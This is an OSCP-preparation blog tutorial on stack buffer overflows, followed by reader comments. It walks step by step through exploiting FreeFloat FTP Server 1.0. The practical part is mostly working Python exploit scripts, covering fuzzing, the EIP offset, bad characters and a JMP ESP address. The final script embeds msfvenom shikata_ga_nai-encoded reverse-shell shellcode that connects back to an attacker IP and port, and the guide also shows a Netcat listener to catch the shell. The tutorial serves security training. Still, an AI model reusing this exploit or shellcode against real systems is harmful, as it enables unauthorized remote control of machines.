Complete Guide to Stack Buffer Overflow (OSCP Preparation)
Introduction
Stack buffer overflow is a memory corruption vulnerability that occurs when a program writes more data to a buffer located on the stack than what is actually allocated for that buffer, therefore overflowing to a memory address that is outside of the intended data structure.
This will often cause the program to crash, and if certain conditions are met, it could allow an attacker to gain remote control of the machine with privileges as high as the user running the program, by redirecting the flow execution of the application to malicious code.
The purpose of this guide is to teach the basics of stack buffer overflow, especially for students preparing for the OSCP certification exam.
Stack Buffer Overflow Theory
Before diving into an actual attack, it is crucial to understand basic concepts of C programming such as memory, the stack, CPU registers, pointers and what happens behind the scenes, in order to take advantage of a memory corruption to compromise a system.
Memory
Normally, a process is allocated a certain amount of memory which contains all of the necessary information it requires to run, such as the code itself and any DLLs, which isn’t shared with other processes.
Whenever an executable is run, its code is loaded into memory so that it can perform all the tasks that is has been programmed to do, because all of the instructions are loaded onto the program’s memory, this can be changed thus making the application perform unintended actions.
All variables in memory are stored using either little endian (for intel x86 processors) or big endian (for PowerPC) format.
In little endian, the bytes are stored in reverse order. So for example:
- 0x032CFBE8 will be stored as “E8FB2C03”
- 0x7734BC0D will be stored as “0DBC3477”
- 0x0BADF00D will be stored as “0DF0AD0B”
This will come useful when redirecting the application execution as the JMP ESP instruction address will have to be stored in reverse in the exploit.
The Stack
The stack is a section of memory that stores temporary data, that is executed when a function is called.
The stack always grows downwards towards lower values as new information is added to it. The ESP CPU register points to the lowest part of the stack and anything below it is free memory that can be overwritten, which is why it is often exploited by injecting malicious code into it.
CPU Registers
Registers are CPU variables that sore single records, there are a fixed number of registers that are used for different purposes and they all have a specific location in the CPU.
Registers can hold pointers which point to memory addresses containing certain instructions for the program to perform, this can be exploited by using a jump instruction to move to a different memory location containing malicious code.
Intel assembly has 8 general purpose and 2 special purpose 32-bit register. Different compilers may have different uses for the registers, the ones listed below are used in Microsoft’s compiler:
Register | Type | Purpose |
EAX | General Purpose | Stores the return value of a function. |
EBX | General Purpose | No specific uses, often set to a commonly used value in a function to speed up calculations. |
ECX | General Purpose | Occasionally used as a function parameter and often used as a loop counter. |
EDX | General Purpose | Occasionally used as a function parameter, also used for storing short-term variables in a function. |
ESI | General Purpose | Used as a pointer, points to the source of instructions that require a source and destination. |
EDI | General Purpose | Often used as a pointer. Points to the destination of instructions that require a source and destination. |
EBP | General Purpose | Has two uses depending on compile settings, it is either the frame pointer or a general purpose register for storing of data used in calculations. |
ESP | General Purpose | A special register that stores a pointer to the top of the stack (virtually under the end of the stack). |
EIP | Special Purpose | Stores a pointer to the address of the instruction that the program is currently executing. After each instruction, a value equal to the its size is added to EIP, meaning it points at the machine code for the next instruction. |
FLAGS | Special Purpose | Stores meta-information about the results of previous operations i.e. whether it overflowed the register or whether the operands were equal. |
Pointers
A pointer is, a variable that stores a memory address as its value, which will correspond to a certain instruction the program will have to perform. The value of the memory address can be obtained by “dereferencing” the pointer.
They are used in buffer overflow attacks to redirect the execution flow to malicious code through a pointer that points at a JMP instruction.
Common Instructions
This section covers some of the most common assembly instructions , their purpose in a program and some example uses:
Instruction Type | Description | Example Instructions |
Pointers and Dereferencing | Since registers simply store values, they may or may not be used as pointers, depending on on the information stored. If being used as a pointer, registers can be dereferenced, retrieving the value stored at the address being pointed to. | movq,movb |
Doing Nothing | The NOP instruction, short for “no operation”, simply does nothing. | NOP |
Moving Data Around | Used to move values and pointers. | mov, movsx, movzx,lea |
Math and Logic | Used for math and logic. Some are simple arithmetic operations and some are complex calculations. | add, sub,inc, dec, and |
Jumping Around | Used mainly to perform jumps to certain memory locations , it stores the address to jump to. | jmp,call, ret,cmp, test |
Manipulating the Stack | Used for adding and removing data from the stack. | push, pop,pushaw |
Some of these instructions are used during the practical example in order to gain remote access to the victim machine.
Stack Buffer Overflow Process
Although applications require a custom exploit to be crafted in order to gain remote access, most stack buffer overflow exploitation, at a high level, involve the following phases:
- Fuzzing the Application to Replicate the Crash
- Finding & Testing the EIP Offset
- Finding Shellcode Space
- Testing for Bad Characters
- Finding & Testing a JMP ESP Instruction Address
- Generating & Adding Shellcode & NOP Slides to the Script
- Gaining Remote Access
The next section will cover these phases in great detail, from both a theoretical and practical standpoint.
Practical Example
This practical example will demonstrate how to exploit a stack buffer overflow vulnerability that affected FreeFloat FTP Server 1.0, an FTP server application. According to the exploit’s author, the crash occurs when sending the following information to the server:
- USER + [arbitrary username]
- PASS + [arbitrary password]
- REST (used to restart a file transfer from a specified point) + 300+ bytes
The entire exploitation process will be conducted using Immunity Debugger, which is free.
A copy of the vulnerable executable along with the proof of concept exploit (in the form of a Metasploit module) can be found at this Exploit DB page.
Windows Defender may need to be disabled if using an external host to debug the application, as by default it does not allow incoming connections.
Crashing the application
First of all we have to cause the application to crash, in order to ascertain there is a buffer overflow vulnerability and this can be further exploited to gain remote access.
Once the FreeFloat FTP Server executable has been downloaded, it can be run by double-clicking it:
This will start the FTP server and open port 21 for incoming connections.
Starting the Immunity Debugger, selecting the File → Attach option to attach it to the FreeFloat FTP process:
Alternatively, the “Open” option can also be used to select an executable:
Once the debugger has been attached to the process, it will enter a pause state. In order to start its execution, the Debug → Run option can be used:
Alternatively, pressing F9 will achieve the same result:
Immunity Debugger uses the following panes used to display information:
- Top-Left Pane – It contains the instruction offset, the original application code, its assembly instruction and comments added by the debugger.
- Bottom-Left Pane -It contains the hex dump of the application itself.
- Top-Right Pane – It contains the CPU registers and their current value.
- Bottom-Right Pane – It contains the Memory stack contents.
Python can be used to generate a buffer of 300 A characters to test the crash:
Establishing a TCP connecting with port 21 using Netcat, logging in with test/test and sending REST plus the buffer created using Python to cause the crash:
This has crashed the program and Immunity Debugger has reported an access violation error:
The EIP register was overwritten with the 300 x41 (which corresponds to A in ASCII) sent through Netcat:
Since EIP stores the next instruction to be executed by the application and we established we can manipulate its value, this can be exploited by redirecting the flow of the program execution to ESP, which can be injected with malicious code.
The fuzzing process can also automated through the use of a Python fuzzer, by sending incremental amounts of data in order to identify exactly at which point the application will crash and therefore stop responding.
Below is an example Python fuzzer for the FreeFloat FTP application:
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
size = 100 #defining an initial buffer size
while(size < 500): #using a while loop to keep sending the buffer until it reaches 500 bytes
try:
print "\nSending evil buffer with %s bytes" % size
buffer ="A" * size #defining the buffer as a bunch of As
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close() #closing the connection
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
size +=100 #increasing the buffer size by 100
sleep(10) #waiting 10 seconds before repeating the loop
except: #if a connection can't be made, print an error and exit cleanly
print "[*]Error in connection with server"
sys.exit()
To connect to the application in a similar fashion to the test done through Netcat, the following script can be used:
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
try:
print "\n[+] Sending evil buffer..."
buffer ="A" * 300 #defining the buffer as a bunch of As
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
print "[*]Error in connection with server"
sys.exit()
Identifying the EIP offset
The next step required is to identify which part of the buffer that is being sent is landing in the EIP register, in order to then modify it to control the execution flow of the program. Because all that was sent was a bunch of As, at the moment there is no way to know what part has overwritten EIP.
The Metasploit msf-pattern_create tool can be used to create a randomly generated string that will be replacing the A characters in order to identify which part lands in EIP:
msf-pattern_create -l [pattern length]
Creating a pattern of 300 characters using msf-pattern_create to keep the same buffer length:
Adding the pattern to the buffer variable in the script, instead of sending the “A” characters:
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
try:
print "\n[+] Sending evil buffer..."
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9" #defining the buffer as a random pattern
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
print "[*]Error in connection with server"
sys.exit()
Restarting the application, re-attaching Immunity Debugger and running the script:
The randomly generated pattern was sent instead of the A characters.
The application crashed with an access violation error as expected, but this time, the EIP register was overwritten with “41326941”
The Metasploit msf-pattern_offset tool can then be used to find the EIP value in the pattern created earlier to calculate the exact EIP offset i.e. the exact location of EIP, which in this case is at byte 246.
msf-pattern_offset -l [pattern length] -q [EIP address]
The following Mona command can also be used to perform this step:
!mona findmsp -distance [pattern length]
Modifying the script to override EIP with four “B” characters instead of the As in order to verify whether the last test was successful:
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
try:
print "\n[+] Sending evil buffer..."
offset = "A" * 246 #defining the offset value
EIP = "B" * 4 #EIP placeholder
padding = "C" * (300 - len(offset) - len(EIP)) #adding padding to keep the same buffer size of 300 bytes
buffer = offset + EIP + padding #assembling the buffer
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
print "[*]Error in connection with server"
sys.exit()
Restarting the application, re-attaching Immunity Debugger and running the script:
As expected, the EIP registry was overwritten with the four “B” characters:
Now that we have full control over EIP, it can be exploited to change redirect the application execution to certain instructions.
Finding Available Shellcode Space
The purpose of this step is to find a suitable location in the memory for our shellcode to then redirect the program execution to it.
When the last script was executed, the C characters that were used to keep the buffer size as 300 overflowed into ESP, so this could be a good place to insert the shellcode:
We can tell the C characters sent to the application landed in ESP from the fifth one onward because ESP’s address is 0064FBE8, which corresponds to the second group of Cs
We now have to verify whether there is enough space for the shellcode inside ESP, which is what will be executed by the system by the program in order to gain remote access.
A normal reverse shell payload is normally about 300-400 bytes, and because only 50 Cs were sent we cannot tell whether there is enough space for it in ESP.
Modifying the script, adding about 550 C characters to the script in a new shellcode variable:
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
try:
print "\n[+] Sending evil buffer..."
offset = "A" * 246 #defining the offset value
EIP = "B" * 4 #EIP placeholder
shellcode = "C" * (800 - (len(offset) -len(EIP))) #Shellcode placeholder using about 550 Cs
buffer = offset + EIP + shellcode #assembling the buffer
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
print "[*]Error in connection with server"
sys.exit()
Restarting the application, re-attaching Immunity Debugger and running the script:
All the “C” characters that were sent by the script have overwritten ESP:
To calculate how many C characters made it into ESP, all we need to do is subtract the address where ESP starts to the one where the Cs end.
Beginning of ESP:
End of the Cs:
Calculating the difference between the two memory addresses using Python, all of the C characters made it into ESP which makes it a suitable shellcode location.
What if there isn’t enough space?
If there isn’t enough space in the ESP register to insert our shellcode, this can be circumvented by using a first stage payload. Since we should be able to override at least the first few characters of ESP, this will be enough to instruct it to jump to a different register where the shellcode will be placed.
If a different register points to the beginner of the buffer, for example ECX:
Then the opcode used to perform a JMP ECX instruction can be generated:
And added to the script, in order to instruct ESP to jump to ECX:
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
try:
print "\n[+] Sending evil buffer..."
offset = "A" * 246 #defining the offset value
EIP = "B" * 4 #EIP placeholder
first_stage = "\xff\xe1" #defining first stage payload as the JMP ECX instruction
shellcode = "C" * (800 - (len(offset) -len(EIP))) #Shellcode placeholder using about 550 Cs
buffer = shellcode + offset + EIP + first_stage #assembling the buffer
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
print "[*]Error in connection with server"
sys.exit()
In this scenario, the shellcode is added to the beginning of the buffer, since the register where it is placed is the first one that our data is written to.
So basically this is what happens when the exploit is run:
- The shellcode is written to ECX
- The buffer causes the application to crash
- EIP is overwritten with a JMP ESP instruction which redirects the execution flow to ESP
- ESP performs a JMP ECX instruction, redirecting the execution to ECX
- The shellcode stored in ECX is then executed
Testing for Bad Characters
Some programs will often consider certain characters as “bad”, and all that means is that if they come across one of them, this will cause a corruption of the rest of the data contained in the instruction sent to the application, not allowing the program to properly interpret the it. One character that is pretty much always considered bad is x00, as it is a null-byte and terminates the rest of the application code.
In this phase all we have to do is identify whether there are any bad characters, so that we can later on remove them from the shellcode.
Modifying the script, adding all possible characters in hex format to a badchars variable and sending it instead of the shellcode placeholder:
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
try:
print "\n[+] Sending evil buffer..."
offset = "A" * 246 #defining the offset value
EIP = "B" * 4 #EIP placeholder
badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" ) #adding all possible characters
buffer = offset + EIP + badchars #assembling the buffer
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
print "[*]Error in connection with server"
sys.exit()
Restarting the application, re-attaching Immunity Debugger and running the script:
Right-clicking on the ESP value and selecting “Follow in Dump” to follow ESP in the application dump and see if all the characters sent made it there:
It looks like the characters stop displaying properly after x09, so this indicates that the next character (x0A) is a bad character
After removing x0A from the badchars variable and following the same process again, this time the characters stopped after x0C , so x0D is also bad
This time, all of the characters made it into the ESP dump, starting from x01 all the way to xFF, so the only bad characters are x00, x0A and x0D.
Finding a JMP ESP Return Address
Now that we can control EIP and found a suitable location for our shellcode (ESP), we need to redirect the execution flow of the program to ESP, so that it will execute the shellcode. In order to do this, we need to find a valid JMP ESP instruction address, which would allow us to “jump” to ESP.
For the address to be valid, it must not be compiled with ASLR support and it cannot contain any of the bad characters found above, as the program needs to be able to interpret the address to perform the jump.
Restarting the application, re-attaching Immunity Debugger and using !mona modules command to find a valid DLL/module:
Finding a valid opcode for the JMP ESP instruction – FFE4 is what we require:
Using the Mona find command to with to find valid pointers for the JMP ESP instruction:
!mona find -s string_to_search_for -m module_to_search_in
It looks like a valid pointer was found (0x7734BC0B), and it doesn’t contains any of the bad characters.
The following Mona command can also be used to find a valid pointer to a JMP ESP instruction address:
!mona jmp -r esp -cpb bad_characters
Copying the address and searching for it in the application instructions using the “follow expression” Immunity feature to ensure it is valid:
It looks like it does correspond to a valid JMP ESP instruction address:
Changing the script replacing the “B” characters used for the EIP register with the newly found JMP ESP instruction address.
The EIP return address has to be entered the other way around as explained in the memory section, since little endian stores bytes in memory in reverse order.
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
try:
print "\n[+] Sending evil buffer..."
offset = "A" * 246 #defining the offset value
EIP = "\x0B\xBC\x34\x77" #EIP placeholder
shellcode = "C" * (800 - (len(offset) -len(EIP))) #Shellcode placeholder using about 550 Cs
buffer = offset + EIP + shellcode #assembling the buffer
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
print "[*]Error in connection with server"
sys.exit()
Breakpoints are used to stop the application execution when a certain memory location is reached and they can be used to ensure the JMP ESP instruction is working correctly.
Restarting the application, re-attaching Immunity Debugger and adding a breakpoint on the JMP ESP instruction address by hitting F2, then starting the program execution:
A breakpoint can also be added by right-clicking the memory location in the top-left pane, and selecting the Breakpoint → Memory, on access option:
Executing the script again:
When the application reaches the JMP ESP instruction, which is where the breakpoint was added, the program execution stops as instructed:
When single-stepping into the application execution using F7, this takes us to the C characters which are the placeholder for our shellcode.
Single-stepping can also be done through the Debug → Step into option:
Generating and Adding Shellcode
At this point we can completely control the execution flow of the program, so all that is left to do is add our shellcode to the exploit to trigger a reverse shell.
The shellcode can be generated using MSFvenom with the following flags:
- -p to specify the payload type, in this case the Windows reverse TCP shell
- LHOST to specify the local host IP address to connect to
- LPORT to specify the local port to connect to
- -f to specify the format, in this case Python
- -b to specify the bad characters, in this case \x00, \x0A and \x0D
- -e to specify the encoder, in this case shikata_ga_nai
- -v to specify the name of the variable used for the shellcode, in this case simply “shellcode”
Because the shellcode is generated using an encoder (which purpose is basic antivirus evasion), the program first needs to decode the shellcode before it can be run. This process will corrupt the next few bytes of information contained in the shellcode, and therefore a few NOP Slides are required to give the decoder enough time to decode it before it is executed by the program.
NOP Slides (No Operation Instructions) have a value of 0x90 and are used to pass execution to the next instruction i.e. let CPU “slide” through them until the shellcode is reached.
Adding the shellcode to the script, along with 20 NOP slides at the beginning of it to avoid errors during the decoding phase:
import errno
from os import strerror
from socket import *
import sys
from time import sleep
from struct import pack
try:
print "\n[+] Sending evil buffer..."
offset = "A" * 246 #defining the offset value
EIP = "\x0B\xBC\x34\x77" #EIP Return Address
#msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.110 LPORT=443 -f py -b "\x00\x0a\x0d" -e x86/shikata_ga_nai -v shellcode
shellcode = b""
shellcode += b"\xda\xda\xd9\x74\x24\xf4\xb8\x6c\x6d\x17\xbc"
shellcode += b"\x5b\x2b\xc9\xb1\x52\x31\x43\x17\x83\xeb\xfc"
shellcode += b"\x03\x2f\x7e\xf5\x49\x53\x68\x7b\xb1\xab\x69"
shellcode += b"\x1c\x3b\x4e\x58\x1c\x5f\x1b\xcb\xac\x2b\x49"
shellcode += b"\xe0\x47\x79\x79\x73\x25\x56\x8e\x34\x80\x80"
shellcode += b"\xa1\xc5\xb9\xf1\xa0\x45\xc0\x25\x02\x77\x0b"
shellcode += b"\x38\x43\xb0\x76\xb1\x11\x69\xfc\x64\x85\x1e"
shellcode += b"\x48\xb5\x2e\x6c\x5c\xbd\xd3\x25\x5f\xec\x42"
shellcode += b"\x3d\x06\x2e\x65\x92\x32\x67\x7d\xf7\x7f\x31"
shellcode += b"\xf6\xc3\xf4\xc0\xde\x1d\xf4\x6f\x1f\x92\x07"
shellcode += b"\x71\x58\x15\xf8\x04\x90\x65\x85\x1e\x67\x17"
shellcode += b"\x51\xaa\x73\xbf\x12\x0c\x5f\x41\xf6\xcb\x14"
shellcode += b"\x4d\xb3\x98\x72\x52\x42\x4c\x09\x6e\xcf\x73"
shellcode += b"\xdd\xe6\x8b\x57\xf9\xa3\x48\xf9\x58\x0e\x3e"
shellcode += b"\x06\xba\xf1\x9f\xa2\xb1\x1c\xcb\xde\x98\x48"
shellcode += b"\x38\xd3\x22\x89\x56\x64\x51\xbb\xf9\xde\xfd"
shellcode += b"\xf7\x72\xf9\xfa\xf8\xa8\xbd\x94\x06\x53\xbe"
shellcode += b"\xbd\xcc\x07\xee\xd5\xe5\x27\x65\x25\x09\xf2"
shellcode += b"\x2a\x75\xa5\xad\x8a\x25\x05\x1e\x63\x2f\x8a"
shellcode += b"\x41\x93\x50\x40\xea\x3e\xab\x03\x1f\xbf\xb3"
shellcode += b"\xbd\x77\xbd\xb3\x40\x33\x48\x55\x28\x53\x1d"
shellcode += b"\xce\xc5\xca\x04\x84\x74\x12\x93\xe1\xb7\x98"
shellcode += b"\x10\x16\x79\x69\x5c\x04\xee\x99\x2b\x76\xb9"
shellcode += b"\xa6\x81\x1e\x25\x34\x4e\xde\x20\x25\xd9\x89"
shellcode += b"\x65\x9b\x10\x5f\x98\x82\x8a\x7d\x61\x52\xf4"
shellcode += b"\xc5\xbe\xa7\xfb\xc4\x33\x93\xdf\xd6\x8d\x1c"
shellcode += b"\x64\x82\x41\x4b\x32\x7c\x24\x25\xf4\xd6\xfe"
shellcode += b"\x9a\x5e\xbe\x87\xd0\x60\xb8\x87\x3c\x17\x24"
shellcode += b"\x39\xe9\x6e\x5b\xf6\x7d\x67\x24\xea\x1d\x88"
shellcode += b"\xff\xae\x2e\xc3\x5d\x86\xa6\x8a\x34\x9a\xaa"
shellcode += b"\x2c\xe3\xd9\xd2\xae\x01\xa2\x20\xae\x60\xa7"
shellcode += b"\x6d\x68\x99\xd5\xfe\x1d\x9d\x4a\xfe\x37"
nops = "\x90" * 20 #NOP Slides
buffer = offset + EIP + nops + shellcode
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #establishing connection
s.recv(2000)
s.send("USER test\r\n") #sending username
s.recv(2000)
s.send("PASS test\r\n") #sending password
s.recv(2000)
s.send("REST "+ buffer +"\r\n") #sending rest and buffer
s.close()
s = socket(AF_INET,SOCK_STREAM)
s.connect(("10.0.0.101",21)) #an additional connection is needed for the crash to occur
sleep(1) #waiting one second
s.close() #closing the connection
print "\n[+] Sending buffer of " + str(len(buffer)) + " bytes..."
print "\n[+] Sending buffer: " + buffer
print "\n[+] Done!"
except: #if a connection can't be made, print an error and exit cleanly
print "[*]Error in connection with server"
sys.exit()
Gaining Remote Access
Once the final exploit has been assembled, the next step is to set up a Netcat listener, which will catch our reverse shell when it is executed, using the following flags:
- -l to listen for incoming connections
- -v for verbose output
- -n to skip the DNS lookup
- -p to specify the port to listen on
Restarting the application without the Immunity Debugger this time
Running the final Python exploit:
A call back was received and a reverse shell was granted as the “stef” user. The privileges granted by the exploit will always match the ones of the user owning the process.
Other Buffer Overflow Examples
Stack buffer overflow is quite a difficult attack to learn, especially when not proficient with assembly programming. In case this post by itself wasn’t enough for you to comprehend the steps required to exploit a stack buffer overflow vulnerability, below are some more exploitation walkthrough examples that I published in the blog:
- Stack Buffer Overflow – Exploiting SLMail 5.5
- Vulnhub – Brainpan 1 Walkthrough
- Stack Buffer Overflow – Vulnserver Guide
- Stack Buffer Overflow – dostackbufferoverflowgood Guide
These are all performed against executables that are available online and have helped me greatly when preparing for the OSCP certification exam.
Conclusion
Stack Buffer Overflow is one of the oldest and most common vulnerabilities exploited by attackers to gain unauthorized access to vulnerable systems.
Control-flow integrity schemes should be implemented to prevent redirection to arbitrary code, prevent execution of malicious code from the stack and randomize the memory space layout to make it harder for attackers to find valid valid instruction addresses to jump to certain sectors of the memory that may contain executable malicious code.
Sources & Useful Links
- https://www.exploit-db.com/exploits/17548
- https://wiki.skullsecurity.org/index.php?title=The_Stack
- https://wiki.skullsecurity.org/index.php?title=Fundamentals
- https://wiki.skullsecurity.org/Registers
- https://wiki.skullsecurity.org/index.php?title=Simple_Instructions
- https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
- https://www.corelan.be/index.php/2009/07/23/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-2/
- https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
- https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/
This is what i was looking for. Your work is appreciated XOXO
Glad it was helpful!
Very good article, thanks for that! Question: wouldn’t be okay to add EXITFUNC=thread into a shellcode in order to not crash teh app after runnig the exploit?
I’m glad it was useful! Yes, that would be perfectly fine, especially in situations where causing the application to crash isn’t ideal.
You went through and determined the ESP had enough space for the program. How does this relate to the ESP space for the dll? Wouldn’t this be different?
ESP is where the shellcode will be placed, whereas the DLL is used as a JUMP point to ESP and it replaces EIP, which is the first instruction.
Thanks! One thing I don’t get, why do you choose ntdll.dll when ASLR protects it?
Hi Markus,
That’s a great question! As far as I know, ASLR is meant to protect from buffer overflow attacks by increasing the space where files, DLLs and other binary are loaded into memory and randomizing where they are loaded to prevent attackers from being able to inject malicious code.
Whether this is a good approach entirely depends on the number of bits used in the randomization process. 32-bit applications will be a lot less secure even though ASLR is implemented. In this specific case, even though ASLR was being used, which would normally randomize the memory location of modules and DLLs, the current location can still be found and used as a JMP ESP address while the application is running, but it would change the next time the application is restarted, making it much more difficult to perform this type of attack without being able to debug the application first, and therefore having to brute force all of the possible 256 memory locations. The author of the exploit used a hard-coded address for the KERNEL32 DLL in the exploit, which makes me think this particular one is not well protected with ASLR (or at least in Windows XP SP3 which is the version mentioned in Exploit DB)
Hope this was helpful!
Awesome website man, I wish I can make something similar with some content like this lmao.
I’m glad it was useful to you 🙂
Hi,
